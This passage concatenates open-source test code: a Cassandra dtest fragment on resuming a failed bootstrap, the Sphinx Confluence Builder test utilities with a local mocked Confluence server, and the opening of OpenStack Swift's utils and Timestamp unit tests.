node2.start(jvm_args=["-Dcassandra.ring_delay_ms=5000"]) self.assert_log_had_msg(node2, 'Some data streaming failed') try: node2.nodetool('join') pytest.fail('nodetool should have errored and failed to join ring') except ToolError as t: assert "Cannot join the ring until bootstrap completes" in t.stdout node2.nodetool('bootstrap resume') node2.wait_for_binary_interface() assert_bootstrap_state(self, node2, 'COMPLETED', user='cassandra', password='cassandra') # Test write survey behaviour node3 = new_node(cluster) node3.set_configuration_options(values=config) # kill stream to node3 in the middle of streaming to let it fail if cluster.version() < '4.0': node1.byteman_submit([self.byteman_submit_path_pre_4_0]) node2.byteman_submit([self.byteman_submit_path_pre_4_0]) else: node1.byteman_submit([self.byteman_submit_path_4_0]) node2.byteman_submit([self.byteman_submit_path_4_0]) node3.start(jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.ring_delay_ms=5000"]) self.assert_log_had_msg(node3, 'Some data streaming failed') self.assert_log_had_msg(node3, "Not starting client transports in write_survey mode as it's bootstrapping or auth is enabled") try: node3.nodetool('join') pytest.fail('nodetool should have errored and failed to join ring') except ToolError as t: assert "Cannot join the ring until bootstrap completes" in t.stdout node3.nodetool('bootstrap resume') self.assert_log_had_msg(node3, "Not starting client transports in write_survey mode as it's bootstrapping or auth is enabled") # Should succeed in joining node3.nodetool('join') self.assert_log_had_msg(node3, "Leaving write survey mode and joining ring at operator request") assert_bootstrap_state(self, node3, 'COMPLETED', user='cassandra', password='cassandra') node3.wait_for_binary_interface()
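    # --- Illustrative sketch (not part of the upstream dtest suite) ---
    # The resumable-bootstrap tests above share the same shape: break streaming
    # with a byteman script, start the joining node, watch for the failure, then
    # finish with `nodetool bootstrap resume`. A hedged distillation of that
    # pattern is sketched below; the helper name is hypothetical, and it assumes
    # the caller supplies an appropriate byteman script path.
    def _resume_bootstrap_after_stream_failure(self, cluster, seed_node, byteman_script):
        """Hedged helper sketch: fail streaming once, then resume bootstrap."""
        # Arrange for the seed node to drop the stream mid-flight.
        seed_node.byteman_submit([byteman_script])

        # Start the joining node; streaming is expected to fail.
        joiner = new_node(cluster)
        joiner.start(wait_other_notice=False)
        joiner.watch_log_for('Some data streaming failed')

        # Resume bootstrap and wait for the node to accept client connections.
        joiner.nodetool('bootstrap resume')
        joiner.wait_for_binary_interface()
        assert_bootstrap_state(self, joiner, 'COMPLETED')
        return joiner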
__init__.py
# -*- coding: utf-8 -*- """ :copyright: Copyright 2016-2022 Sphinx Confluence Builder Contributors (AUTHORS) :license: BSD-2-Clause (LICENSE) """ from bs4 import BeautifulSoup from contextlib import contextmanager from copy import deepcopy from pkg_resources import parse_version from sphinx.__init__ import __version__ as sphinx_version from sphinx.application import Sphinx from sphinx.util.console import color_terminal from sphinx.util.console import nocolor from sphinx.util.docutils import docutils_namespace from sphinxcontrib.confluencebuilder import compat from sphinxcontrib.confluencebuilder import util from threading import Event from threading import Lock from threading import Thread import inspect import json import os import shutil import sys import time try: import http.server as http_server except ImportError: import SimpleHTTPServer as http_server try: import socketserver as server_socket except ImportError: import SocketServer as server_socket # full extension name EXT_NAME = 'sphinxcontrib.confluencebuilder' class ConfluenceInstanceServer(server_socket.TCPServer): def __init__(self): """ confluence instance server Helps spawn an TCP server on a random local port to help emulate a Confluence instance. Attributes: del_req: delete requests cached by handler del_rsp: delete responses to use in the handler get_req: get requests cached by handler get_rsp: get responses to use in the handler put_req: put requests cached by handler put_rsp: put responses to use in the handler """ LOCAL_RANDOM_PORT = ('127.0.0.1', 0) server_socket.TCPServer.__init__(self, LOCAL_RANDOM_PORT, ConfluenceInstanceRequestHandler) self.mtx = Lock() self.del_req = [] self.del_rsp = [] self.get_req = [] self.get_rsp = [] self.put_req = [] self.put_rsp = [] def check_unhandled_requests(self): """ check if there are any unhandled requests still cached Provides a helper call to allow a unit test to check if there are any handled requests that have not been pop'ed from the instance. Provides an easy way to verify that no unexpected requests have been made. Returns: whether or not there are still requests cached """ with self.mtx: if self.del_req or self.get_req or self.put_req: return True return False def pop_delete_request(self): """ pop the cached delete request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. Returns: the next delete request; ``None`` if no request was made """ try: with self.mtx: return self.del_req.pop(0) except IndexError: return None def pop_get_request(self): """ pop the cached get request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. Returns: the next get request; ``None`` if no request was made """ try: with self.mtx: return self.get_req.pop(0) except IndexError: return None def pop_put_request(self): """ pop the cached put request made to the mocked server Allows a unit test to pop the next available request path/headers that have been pushed into the mocked Confluence server. This allows a unit test to verify desired (or undesired) request values. 
Returns: the next put request; ``None`` if no request was made """ try: with self.mtx: return self.put_req.pop(0) except IndexError: return None def register_delete_rsp(self, code,): """ register a delete response Registers a response the instance should return when a DELETE request is being served. Args: code: the response code """ with self.mtx: self.del_rsp.append(code) def register_get_rsp(self, code, data): """ register a get response Registers a response the instance should return when a GET request is being served. Args: code: the response code data: the data """ if data: if isinstance(data, dict): data = json.dumps(data) data = data.encode('utf-8') with self.mtx: self.get_rsp.append((code, data)) def register_put_rsp(self, code, data): """ register a put response Registers a response the instance should return when a PUT request is being served. Args: code: the response code data: the data """ if data: if isinstance(data, dict): data = json.dumps(data) data = data.encode('utf-8') with self.mtx: self.put_rsp.append((code, data)) class ConfluenceInstanceRequestHandler(server_socket.ThreadingMixIn, http_server.SimpleHTTPRequestHandler): """ confluence instance request handler Provides the handler implementation when a z instance wishes to serve an HTTP request. This handler will pull responses (if any) populated into the server instance. If no responses are provided, the default response will be a 500 error with no data. """ def do_DELETE(self): """ serve a delete request This method is called when a DELETE request is being processed by this handler. """ with self.server.mtx: self.server.del_req.append((self.path, dict(self.headers))) try: code = self.server.del_rsp.pop(0) except IndexError: code = 500 self.send_response(code) self.end_headers() def do_GET(self): """ serve a get request This method is called when a GET request is being processed by this handler. """ with self.server.mtx: self.server.get_req.append((self.path, dict(self.headers))) try: code, data = self.server.get_rsp.pop(0) except IndexError: code = 500 data = None self.send_response(code) self.end_headers() if data: self.wfile.write(data) def do_PUT(self): """ serve a put request This method is called when a PUT request is being processed by this handler. """ with self.server.mtx: self.server.put_req.append((self.path, dict(self.headers))) try: code, data = self.server.put_rsp.pop(0) except IndexError: code = 500 data = None self.send_response(code) self.end_headers() if data: self.wfile.write(data) class MockedConfig(dict): """ mocked sphinx configuration Provides a class to mock a Sphinx configuration for testing, to support both dictionary key and attribute calls. """ def __getattr__(self, name): if name in self: return self[name] return None def __setattr__(self, name, value): self[name] = value def clone(self): cloned = MockedConfig() for key, value in self.items(): if value is None or callable(value): cloned[key] = value else: cloned[key] = deepcopy(value) return cloned def enable_sphinx_info(verbosity=None): """ enable verbosity for features handled by this utility class When invoked, this utility class will attempt to prepare or invoke requests in a verbose manner. 
Args: verbosity (optional): configure verbosity on the sphinx application """ os.environ['SPHINX_STATUS'] = '1' if verbosity: os.environ['SPHINX_VERBOSITY'] = str(verbosity) @contextmanager def mock_confluence_instance(config=None, ignore_requests=False): """ spawns a mocked confluence instance which publishing attempts to be checked The following spawns a mocked Confluence instance, which will create an local HTTP server to serve API requests from a publisher instance. Args: config (optional): the configuration to populate a publisher url on ignore_requests (optional): whether or not requests made to the server should be ignored (default: ``False``) Yields: the http daemon """ serve_thread = None try: # spawn a mocked server instance daemon = ConfluenceInstanceServer() host, port = daemon.server_address if config: config.confluence_server_url = 'http://{}:{}/'.format(host, port) # start accepting requests if not ignore_requests: sync = Event() def serve_forever(daemon, sync): sync.set() daemon.serve_forever() serve_thread = Thread(target=serve_forever, args=(daemon, sync,)) serve_thread.start() # wait for the serving thread to be running sync.wait() # yeild context for a moment to help ensure the daemon is serving time.sleep(0.1) yield daemon finally: if serve_thread: daemon.shutdown() serve_thread.join() else: daemon.socket.close() @contextmanager def mock_getpass(mock): def _(prompt='Password: ', stream=sys.stdout): stream.write(prompt) stream.write('(mocked input> ') stream.write(mock) stream.write('\n') return mock try: original = util.getpass2 try: util.getpass2 = _ yield finally: util.getpass2 = original finally: pass @contextmanager def mock_input(mock): def _(prompt=''): print(prompt + '(mocked input> ' + mock) return mock try: original = compat.compat_input try: compat.compat_input = _ yield finally: compat.compat_input = original finally: pass @contextmanager def parse(filename, dirname=None): """ parse the output of a generated sphinx document Parses the provided filename for generated Confluence-supported markup which can be examined for expected content. This function will return an instance of BeautifulSoup which a tester can take advantage of the utility calls the library provides. Args: filename: the filename to parse dirname (optional): the directory the provided filename exists in Returns: the parsed output """ if dirname: target = os.path.join(dirname, filename) else: target = filename target += '.conf' with open(target, 'r') as fp: soup = BeautifulSoup(fp, 'html.parser') yield soup def prepare_conf(): """ prepare minimal sphinx configuration for sphinx application Prepares a minimum number of required configuration values into a dictionary for unit tests to extend. This dictionary can be passed into a Sphinx application instance. """ config = MockedConfig() config['extensions'] = [ EXT_NAME, # include any forced-injected extensions (config support) 'sphinx.ext.imgmath', ] config['confluence_publish'] = False # support pre-Sphinx v2.0 installations which default to 'contents' if parse_version(sphinx_version) < parse_version('2.0'): config['master_doc'] = 'index' return config def prepare_dirs(container=None, f_back_count=1, postfix=None): """ return the output directory base for all unit tests This utility method is used to provide other tests the location to store output files. This method will ensure the output directory is removed before returning. 
Args: container (optional): the output container name to use f_back_count (optional): number of frame objects to move back when attempting to auto-generate a container name postfix (optional): postfix to add to the container directory Returns: the output directory """ if not container: frame = inspect.currentframe() for _ in range(f_back_count): frame = frame.f_back container = frame.f_code.co_name lib_dir = os.path.dirname(os.path.realpath(__file__)) test_dir = os.path.join(lib_dir, os.pardir) base_dir = os.path.join(test_dir, os.pardir) output_dir = os.path.join(base_dir, 'output') container_dir = os.path.abspath(os.path.join(output_dir, container)) if postfix: container_dir += postfix shutil.rmtree(container_dir, ignore_errors=True) return container_dir @contextmanager def prepare_sphinx(src_dir, config=None, out_dir=None, extra_config=None, builder=None, relax=False): """ prepare a sphinx application instance Return a prepared Sphinx application instance [1] ready for execution. [1]: https://github.com/sphinx-doc/sphinx/blob/master/sphinx/application.py Args: src_dir: document sources config (optional): configuration to use out_dir (optional): output for generated documents extra_config (optional): additional configuration data to apply builder (optional): the builder to use relax (optional): do not generate warnings as errors """ # Enable coloring of warning and other messages. Note that this can # cause sys.stderr to be mocked which is why we pass the new value # explicitly on the call to Sphinx() below. if 'MSYSTEM' not in os.environ and not color_terminal(): nocolor() conf = dict(config) if config else {} if extra_config: conf.update(extra_config) conf_dir = src_dir if config is None else None warnerr = not relax sts = None if 'SPHINX_STATUS' in os.environ: sts = sys.stdout verbosity = 0 if 'SPHINX_VERBOSITY' in os.environ: try: verbosity = int(os.environ['SPHINX_VERBOSITY']) except ValueError: pass # default to using this extension's builder if not builder: builder = 'confluence' if not out_dir: # 3 = prepare_dirs, this, contextmanager out_dir = prepare_dirs(f_back_count=3) doctrees_dir = os.path.join(out_dir, '.doctrees') # support pre-Sphinx v4.0 installations which do not have `root_doc` by # swapping to the obsolete configuration name if parse_version(sphinx_version) < parse_version('4.0'): if 'root_doc' in conf: conf['master_doc'] = conf['root_doc'] del conf['root_doc'] with docutils_namespace(): app = Sphinx( src_dir, # output for document sources conf_dir, # configuration directory out_dir, # output for generated documents doctrees_dir, # output for doctree files builder, # builder to execute confoverrides=conf, # load provided configuration (volatile) status=sts, # status output warning=sys.stderr, # warnings output warningiserror=warnerr, # treat warnings as errors verbosity=verbosity) # verbosity yield app def prepare_sphinx_filenames(src_dir, filenames, configs=None): """ prepare explicit filenames for a sphinx application instance A Sphinx engine allows accepting a list of filenames it will process; however, these filenames need to be set to full paths. This is not always convenient for testing, so this utility allows generating a filename list with the source directory prefixed for each entry. In addition, when passing a documentation set to process, Sphinx requires that the documentation set has an existing root document. In some testing datasets, they may not have one that exists. 
If this is detected, this helper will adjust the configuration to adjust the root document to a provided filename, which should prevent issues when the Sphinx application prepares an environment. This is only performed when configurations are provided in to this call. Multiple configuration entries can be provided, and only the last configuration entry (must exist and) will be updated in the event when a change is needed. Args: src_dir: document sources filenames: the documents to process relative to src_dir (no extensions) configs (optional): list of configurations to check for root doc issue Returns: the updated file name list """ files = [] for filename in filenames: files.append(os.path.join(src_dir, filename + '.rst')) if configs: root_doc = 'index' for config in configs: if config and 'root_doc' in config: root_doc = config['root_doc'] break if root_doc not in filenames: configs[-1]['root_doc'] = filenames[0] # update last config return files def build_sphinx(src_dir, config=None, out_dir=None, extra_config=None, builder=None, relax=False, filenames=None): """ prepare a sphinx application instance Creates, invokes and cleans up a Sphinx application instance [1]. [1]: https://github.com/sphinx-doc/sphinx/blob/master/sphinx/application.py Args: src_dir: document sources config (optional): configuration to use out_dir (optional): output for generated documents extra_config (optional): additional configuration data to apply builder (optional): the builder to use relax (optional): do not generate warnings as errors filenames (optional): specific documents to process Returns: the output directory """ if not out_dir: # 2 = prepare_dirs, this out_dir = prepare_dirs(f_back_count=2) files = [] force_all = True if filenames: # force-all not supported when using explicit filenames force_all = False # sphinx application requires full paths for explicit filenames extra_config = dict(extra_config) if extra_config else {} files = prepare_sphinx_filenames(src_dir, filenames, configs=(config, extra_config)) with prepare_sphinx( src_dir, config=config, out_dir=out_dir, extra_config=extra_config, builder=builder, relax=relax) as app: app.build(force_all=force_all, filenames=files) return out_dir
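# --- Illustrative usage sketch (not part of this module) ---
# A hedged example of how a unit test might wire the helpers above together:
# prepare a configuration, point it at the mocked Confluence instance, queue a
# canned GET response, run a build, and then inspect what the publisher sent.
# The function name, the canned payload, and the single registered response are
# assumptions for illustration; real tests register one response per expected
# REST call and add whatever publish-related configuration the build needs.
def _example_mocked_publish(src_dir):
    config = prepare_conf()
    config['confluence_publish'] = True

    with mock_confluence_instance(config) as daemon:
        # queue a single canned response; any further requests fall back to 500
        daemon.register_get_rsp(200, {'results': [], 'size': 0})

        out_dir = build_sphinx(src_dir, config=config, relax=True)

        # examine the first GET request the publisher made (None if no request)
        first_get = daemon.pop_get_request()
        return out_dir, first_get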
test_utils.py
# Copyright (c) 2010-2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for swift.common.utils""" from __future__ import print_function import hashlib from test.unit import temptree, debug_logger, make_timestamp_iter, \ with_tempdir, mock_timestamp_now import ctypes import contextlib import errno import eventlet import eventlet.debug import eventlet.event import eventlet.patcher import functools import grp import logging import platform import os import mock import posix import pwd import random import re import socket import string import sys import json import math import inspect import six from six import StringIO from six.moves.queue import Queue, Empty from six.moves import http_client from six.moves import range from textwrap import dedent import tempfile import time import unittest import fcntl import shutil from getpass import getuser from io import BytesIO from shutil import rmtree from functools import partial from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp from netifaces import AF_INET6 from mock import MagicMock, patch from six.moves.configparser import NoSectionError, NoOptionError from uuid import uuid4 from swift.common.exceptions import Timeout, MessageTimeout, \ ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \ MimeInvalid from swift.common import utils from swift.common.utils import is_valid_ip, is_valid_ipv4, is_valid_ipv6, \ set_swift_dir from swift.common.container_sync_realms import ContainerSyncRealms from swift.common.header_key_dict import HeaderKeyDict from swift.common.storage_policy import POLICIES, reload_storage_policies from swift.common.swob import Request, Response from test.unit import FakeLogger, requires_o_tmpfile_support_in_tmp, \ quiet_eventlet_exceptions threading = eventlet.patcher.original('threading') class MockOs(object): def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None): if pass_funcs is None: pass_funcs = [] if called_funcs is None: called_funcs = [] if raise_funcs is None: raise_funcs = [] self.closed_fds = [] for func in pass_funcs: setattr(self, func, self.pass_func) self.called_funcs = {} for func in called_funcs: c_func = partial(self.called_func, func) setattr(self, func, c_func) for func in raise_funcs: r_func = partial(self.raise_func, func) setattr(self, func, r_func) def pass_func(self, *args, **kwargs): pass setgroups = chdir = setsid = setgid = setuid = umask = pass_func def called_func(self, name, *args, **kwargs): self.called_funcs[name] = args def raise_func(self, name, *args, **kwargs): self.called_funcs[name] = args raise OSError() def dup2(self, source, target): self.closed_fds.append(target) def geteuid(self): '''Pretend we are running as root.''' return 0 def __getattr__(self, name): # I only over-ride portions of the os module try: return object.__getattr__(self, name) except AttributeError: return getattr(os, name) class MockUdpSocket(object): def __init__(self, sendto_errno=None): self.sent = [] self.sendto_errno = sendto_errno def sendto(self, data, target): 
if self.sendto_errno: raise socket.error(self.sendto_errno, 'test errno %s' % self.sendto_errno) self.sent.append((data, target)) def close(self): pass class MockSys(object): def __init__(self): self.stdin = TemporaryFile('w') self.stdout = TemporaryFile('r') self.stderr = TemporaryFile('r') self.__stderr__ = self.stderr self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(), self.stderr.fileno()] def reset_loggers(): if hasattr(utils.get_logger, 'handler4logger'): for logger, handler in utils.get_logger.handler4logger.items(): logger.removeHandler(handler) delattr(utils.get_logger, 'handler4logger') if hasattr(utils.get_logger, 'console_handler4logger'): for logger, h in utils.get_logger.console_handler4logger.items(): logger.removeHandler(h) delattr(utils.get_logger, 'console_handler4logger') # Reset the LogAdapter class thread local state. Use get_logger() here # to fetch a LogAdapter instance because the items from # get_logger.handler4logger above are the underlying logger instances, # not the LogAdapter. utils.get_logger(None).thread_locals = (None, None) def reset_logger_state(f): @functools.wraps(f) def wrapper(self, *args, **kwargs): reset_loggers() try: return f(self, *args, **kwargs) finally: reset_loggers() return wrapper class TestUTC(unittest.TestCase): def test_tzname(self): self.assertEqual(utils.UTC.tzname(None), 'UTC') class TestTimestamp(unittest.TestCase): """Tests for swift.common.utils.Timestamp""" def test_invalid_input(self): self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1) self.assertRaises(ValueError, utils.Timestamp, '123.456_78_90') def test_invalid_string_conversion(self): t = utils.Timestamp.now() self.assertRaises(TypeError, str, t) def test_offset_limit(self): t = 1417462430.78693 # can't have a offset above MAX_OFFSET self.assertRaises(ValueError, utils.Timestamp, t, offset=utils.MAX_OFFSET + 1) # exactly max offset is fine ts = utils.Timestamp(t, offset=utils.MAX_OFFSET) self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff') # but you can't offset it further self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1) # unless you start below it ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1) self.assertEqual(utils.Timestamp(ts.internal, offset=1), '1417462430.78693_ffffffffffffffff') def test_normal_format_no_offset(self): expected = '1402436408.91203' test_values = ( '1402436408.91203', '1402436408.91203_00000000', '1402436408.912030000', '1402436408.912030000_0000000000000', '000001402436408.912030000', '000001402436408.912030000_0000000000', 1402436408.91203, 1402436408.912029, 1402436408.9120300000000000, 1402436408.91202999999999999, utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.912029), utils.Timestamp(1402436408.912029, offset=0), utils.Timestamp('1402436408.91203'), utils.Timestamp('1402436408.91203', offset=0), utils.Timestamp('1402436408.91203_00000000'), utils.Timestamp('1402436408.91203_00000000', offset=0), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(timestamp.normal, expected) # timestamp instance can also compare to string or float self.assertEqual(timestamp, expected) self.assertEqual(timestamp, float(expected)) self.assertEqual(timestamp, utils.normalize_timestamp(expected)) def test_isoformat(self): expected = '2014-06-10T22:47:32.054580' test_values = ( '1402440452.05458', '1402440452.054579', '1402440452.05458_00000000', '1402440452.054579_00000000', '1402440452.054580000', 
'1402440452.054579999', '1402440452.054580000_0000000000000', '1402440452.054579999_0000ff00', '000001402440452.054580000', '000001402440452.0545799', '000001402440452.054580000_0000000000', '000001402440452.054579999999_00000fffff', 1402440452.05458, 1402440452.054579, 1402440452.0545800000000000, 1402440452.054579999, utils.Timestamp(1402440452.05458), utils.Timestamp(1402440452.0545799), utils.Timestamp(1402440452.05458, offset=0), utils.Timestamp(1402440452.05457999999, offset=0), utils.Timestamp(1402440452.05458, offset=100), utils.Timestamp(1402440452.054579, offset=100), utils.Timestamp('1402440452.05458'), utils.Timestamp('1402440452.054579999'), utils.Timestamp('1402440452.05458', offset=0), utils.Timestamp('1402440452.054579', offset=0), utils.Timestamp('1402440452.05458', offset=300), utils.Timestamp('1402440452.05457999', offset=300), utils.Timestamp('1402440452.05458_00000000'), utils.Timestamp('1402440452.05457999_00000000'), utils.Timestamp('1402440452.05458_00000000', offset=0), utils.Timestamp('1402440452.05457999_00000aaa', offset=0), utils.Timestamp('1402440452.05458_00000000', offset=400), utils.Timestamp('1402440452.054579_0a', offset=400), ) for value in test_values: self.assertEqual(utils.Timestamp(value).isoformat, expected) expected = '1970-01-01T00:00:00.000000' test_values = ( '0', '0000000000.00000', '0000000000.00000_ffffffffffff', 0, 0.0, ) for value in test_values: self.assertEqual(utils.Timestamp(value).isoformat, expected) def test_not_equal(self): ts = '1402436408.91203_0000000000000001' test_values = ( utils.Timestamp('1402436408.91203_0000000000000002'), utils.Timestamp('1402436408.91203'), utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91204), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.91203, offset=2), ) for value in test_values: self.assertTrue(value != ts) self.assertIs(True, utils.Timestamp(ts) == ts) # sanity self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts)) self.assertIs(False, utils.Timestamp(ts) != ts) self.assertIs(False, utils.Timestamp(ts) is None) self.assertIs(True, utils.Timestamp(ts) is not None) def test_no_force_internal_no_offset(self): """Test that internal is the same as normal with no offset""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000') self.assertEqual(utils.Timestamp(1402437380.58186).internal, '1402437380.58186') self.assertEqual(utils.Timestamp(1402437380.581859).internal, '1402437380.58186') self.assertEqual(utils.Timestamp(0).internal, utils.normalize_timestamp(0)) def test_no_force_internal_with_offset(self): """Test that internal always includes the offset if significant""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual(utils.Timestamp(0, offset=1).internal, '0000000000.00000_0000000000000001') self.assertEqual( utils.Timestamp(1402437380.58186, offset=16).internal, '1402437380.58186_0000000000000010') self.assertEqual( utils.Timestamp(1402437380.581859, offset=240).internal, '1402437380.58186_00000000000000f0') self.assertEqual( utils.Timestamp('1402437380.581859_00000001', offset=240).internal, '1402437380.58186_00000000000000f1') def test_force_internal(self): """Test that internal always includes the offset if forced""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True): self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000_0000000000000000') self.assertEqual(utils.Timestamp(1402437380.58186).internal, 
'1402437380.58186_0000000000000000') self.assertEqual(utils.Timestamp(1402437380.581859).internal, '1402437380.58186_0000000000000000') self.assertEqual(utils.Timestamp(0, offset=1).internal, '0000000000.00000_0000000000000001') self.assertEqual( utils.Timestamp(1402437380.58186, offset=16).internal, '1402437380.58186_0000000000000010') self.assertEqual( utils.Timestamp(1402437380.581859, offset=16).internal, '1402437380.58186_0000000000000010') def test_internal_format_no_offset(self): expected = '1402436408.91203_0000000000000000' test_values = ( '1402436408.91203', '1402436408.91203_00000000', '1402436408.912030000', '1402436408.912030000_0000000000000', '000001402436408.912030000', '000001402436408.912030000_0000000000', 1402436408.91203, 1402436408.9120300000000000, 1402436408.912029, 1402436408.912029999999999999, utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.912029), utils.Timestamp(1402436408.91202999999999999, offset=0), utils.Timestamp('1402436408.91203'), utils.Timestamp('1402436408.91203', offset=0), utils.Timestamp('1402436408.912029'), utils.Timestamp('1402436408.912029', offset=0), utils.Timestamp('1402436408.912029999999999'), utils.Timestamp('1402436408.912029999999999', offset=0), ) for value in test_values: # timestamp instance is always equivalent self.assertEqual(utils.Timestamp(value), expected) if utils.FORCE_INTERNAL: # the FORCE_INTERNAL flag makes the internal format always # include the offset portion of the timestamp even when it's # not significant and would be bad during upgrades self.assertEqual(utils.Timestamp(value).internal, expected) else: # unless we FORCE_INTERNAL, when there's no offset the # internal format is equivalent to the normalized format self.assertEqual(utils.Timestamp(value).internal, '1402436408.91203') def test_internal_format_with_offset(self): expected = '1402436408.91203_00000000000000f0' test_values = ( '1402436408.91203_000000f0', u'1402436408.91203_000000f0', b'1402436408.91203_000000f0', '1402436408.912030000_0000000000f0', '1402436408.912029_000000f0', '1402436408.91202999999_0000000000f0', '000001402436408.912030000_000000000f0', '000001402436408.9120299999_000000000f0', utils.Timestamp(1402436408.91203, offset=240), utils.Timestamp(1402436408.912029, offset=240), utils.Timestamp('1402436408.91203', offset=240), utils.Timestamp('1402436408.91203_00000000', offset=240), utils.Timestamp('1402436408.91203_0000000f', offset=225), utils.Timestamp('1402436408.9120299999', offset=240), utils.Timestamp('1402436408.9120299999_00000000', offset=240), utils.Timestamp('1402436408.9120299999_00000010', offset=224), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(timestamp.internal, expected) # can compare with offset if the string is internalized self.assertEqual(timestamp, expected) # if comparison value only includes the normalized portion and the # timestamp includes an offset, it is considered greater normal = utils.Timestamp(expected).normal self.assertTrue(timestamp > normal, '%r is not bigger than %r given %r' % ( timestamp, normal, value)) self.assertTrue(timestamp > float(normal), '%r is not bigger than %f given %r' % ( timestamp, float(normal), value)) def test_short_format_with_offset(self): expected = '1402436408.91203_f0' timestamp = utils.Timestamp(1402436408.91203, 0xf0) self.assertEqual(expected, timestamp.short) expected = '1402436408.91203' timestamp = utils.Timestamp(1402436408.91203) self.assertEqual(expected, timestamp.short) def 
test_raw(self): expected = 140243640891203 timestamp = utils.Timestamp(1402436408.91203) self.assertEqual(expected, timestamp.raw) # 'raw' does not include offset timestamp = utils.Timestamp(1402436408.91203, 0xf0) self.assertEqual(expected, timestamp.raw) def test_delta(self): def _assertWithinBounds(expected, timestamp): tolerance = 0.00001 minimum = expected - tolerance maximum = expected + tolerance self.assertTrue(float(timestamp) > minimum) self.assertTrue(float(timestamp) < maximum) timestamp = utils.Timestamp(1402436408.91203, delta=100) _assertWithinBounds(1402436408.91303, timestamp) self.assertEqual(140243640891303, timestamp.raw) timestamp = utils.Timestamp(1402436408.91203, delta=-100) _assertWithinBounds(1402436408.91103, timestamp) self.assertEqual(140243640891103, timestamp.raw) timestamp = utils.Timestamp(1402436408.91203, delta=0) _assertWithinBounds(1402436408.91203, timestamp) self.assertEqual(140243640891203, timestamp.raw) # delta is independent of offset timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100) self.assertEqual(140243640891303, timestamp.raw) self.assertEqual(42, timestamp.offset) # cannot go negative self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203, delta=-140243640891203) def test_int(self): expected = 1402437965 test_values = ( '1402437965.91203', '1402437965.91203_00000000', '1402437965.912030000', '1402437965.912030000_0000000000000', '000001402437965.912030000', '000001402437965.912030000_0000000000', 1402437965.91203, 1402437965.9120300000000000, 1402437965.912029, 1402437965.912029999999999999, utils.Timestamp(1402437965.91203), utils.Timestamp(1402437965.91203, offset=0), utils.Timestamp(1402437965.91203, offset=500), utils.Timestamp(1402437965.912029), utils.Timestamp(1402437965.91202999999999999, offset=0), utils.Timestamp(1402437965.91202999999999999, offset=300), utils.Timestamp('1402437965.91203'), utils.Timestamp('1402437965.91203', offset=0), utils.Timestamp('1402437965.91203', offset=400), utils.Timestamp('1402437965.912029'), utils.Timestamp('1402437965.912029', offset=0), utils.Timestamp('1402437965.912029', offset=200), utils.Timestamp('1402437965.912029999999999'), utils.Timestamp('1402437965.912029999999999', offset=0), utils.Timestamp('1402437965.912029999999999', offset=100), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(int(timestamp), expected) self.assertTrue(timestamp > expected) def test_float(self): expected = 1402438115.91203 test_values = ( '1402438115.91203', '1402438115.91203_00000000', '1402438115.912030000', '1402438115.912030000_0000000000000', '000001402438115.912030000', '000001402438115.912030000_0000000000', 1402438115.91203, 1402438115.9120300000000000, 1402438115.912029, 1402438115.912029999999999999, utils.Timestamp(1402438115.91203), utils.Timestamp(1402438115.91203, offset=0), utils.Timestamp(1402438115.91203, offset=500), utils.Timestamp(1402438115.912029), utils.Timestamp(1402438115.91202999999999999, offset=0), utils.Timestamp(1402438115.91202999999999999, offset=300), utils.Timestamp('1402438115.91203'), utils.Timestamp('1402438115.91203', offset=0), utils.Timestamp('1402438115.91203', offset=400), utils.Timestamp('1402438115.912029'), utils.Timestamp('1402438115.912029', offset=0), utils.Timestamp('1402438115.912029', offset=200), utils.Timestamp('1402438115.912029999999999'), utils.Timestamp('1402438115.912029999999999', offset=0), utils.Timestamp('1402438115.912029999999999', offset=100), ) tolerance = 0.00001 minimum = expected - tolerance 
